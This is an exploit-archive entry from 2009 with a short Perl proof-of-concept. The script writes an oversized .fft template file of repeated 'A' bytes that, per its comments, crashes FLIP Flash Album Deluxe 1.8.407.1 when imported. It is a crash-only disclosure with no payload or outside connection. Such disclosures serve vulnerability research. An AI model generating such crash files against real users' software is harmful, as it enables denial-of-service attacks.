id: 6976
date: 08/23/2009
title: FLIP Flash Album Deluxe 1.8.407.1 (.fft File) Crash PoC
author: the_Edit0r
cves: 

=======================================================
FLIP Flash Album Deluxe 1.8.407.1 (.fft File) Crash PoC
=======================================================


#!/usr/bin/perl
#[+] Bug : FLIP Flash Album Deluxe 1.8.407.1 (.fft File) Crash Vulnerability  Exploit
#[+] program  Download : http://www.goztun.com/download/FlipFlashAlbumDeluxeSetup.exe
#[+] Author : the_Edit0r
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP3
#[+] web site: Expl0iters.ir  * Anti-security.ir
#[+] Big thnx: H4ckcity Member


my $crash="\x41\x41\x41\x41\x41" x 100005;
open(myfile,'>>Edit0r.fft');
print myfile $crash;
close($FILE);
print "File Created successfully\n";

# After Clicking On file Perl  Run The Program  ,import template  ( .fft  file) Boom !!!!!!! the Program Crashed




#  0day.today [2023-03-26]  #